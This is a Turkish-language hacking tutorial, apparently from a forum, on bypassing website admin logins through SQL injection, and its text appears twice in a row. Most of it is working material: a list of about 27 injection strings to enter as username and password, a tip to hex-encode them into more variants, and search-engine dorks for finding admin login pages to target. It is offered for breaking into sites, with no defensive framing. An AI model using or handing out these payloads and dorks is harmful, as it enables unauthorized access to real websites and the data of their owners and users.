SQL İnjection Login Bypass
"Sql Injection Login Bypass" Nedir ?
Girilen Zararlı Karakterlerin Filtrelenmemesinden Dolayı Kaynaklanan Açıktır.Aynı Sql Injectiondaki Gibi Veri Tabanından Bilgi Çekmek İçin Kullanılan Komutlar İle Siteye Giriş Yapılır.Buradaki Amaç Komutları Username ve Password Kısmına Yazarak Siteye Giriş Yapmaktır.
"Sql Injection Login Bypass" Nasıl Uygulanır ?
Örnek Olarak Bir Sitenin Admin Paneline Girdiğimizi Varsayıyorum.Bir User ve Pass İsteyen İnput Bölümü Var.Şimdi Komutları Kullanarak Girmeyi Deneyelim.
User ve Pass Kısmına
Kod: [Gösterim]
User: 'or'
Pass: 'or'
Bu Komutları Yazarak Girişimizi Sağlayabiliriz.Bu Komutlar Haricinde Başka Komutlarıda Deneyebilirsiniz.
Kod: [Gösterim]
1’or’1’=’1
‘ or 1=1 –
1’or’1’=’1
admin’–
admin'--
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’=’a
hi’) or (‘a’=’a
hi”) or (“a”=”)
Not:Bu Komutlar Hexlenerek Çoğaltılabilir.
Admin Panel Dorkları
Kod: [Gösterim]
Dorklar:
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
"Sql Injection Login Bypass" Nedir ?
Girilen Zararlı Karakterlerin Filtrelenmemesinden Dolayı Kaynaklanan Açıktır.Aynı Sql Injectiondaki Gibi Veri Tabanından Bilgi Çekmek İçin Kullanılan Komutlar İle Siteye Giriş Yapılır.Buradaki Amaç Komutları Username ve Password Kısmına Yazarak Siteye Giriş Yapmaktır.
"Sql Injection Login Bypass" Nasıl Uygulanır ?
Örnek Olarak Bir Sitenin Admin Paneline Girdiğimizi Varsayıyorum.Bir User ve Pass İsteyen İnput Bölümü Var.Şimdi Komutları Kullanarak Girmeyi Deneyelim.
User ve Pass Kısmına
Kod: [Gösterim]
User: 'or'
Pass: 'or'
Bu Komutları Yazarak Girişimizi Sağlayabiliriz.Bu Komutlar Haricinde Başka Komutlarıda Deneyebilirsiniz.
Kod: [Gösterim]
1’or’1’=’1
‘ or 1=1 –
1’or’1’=’1
admin’–
admin'--
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’=’a
hi’) or (‘a’=’a
hi”) or (“a”=”)
Not:Bu Komutlar Hexlenerek Çoğaltılabilir.
Admin Panel Dorkları
Kod: [Gösterim]
Dorklar:
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp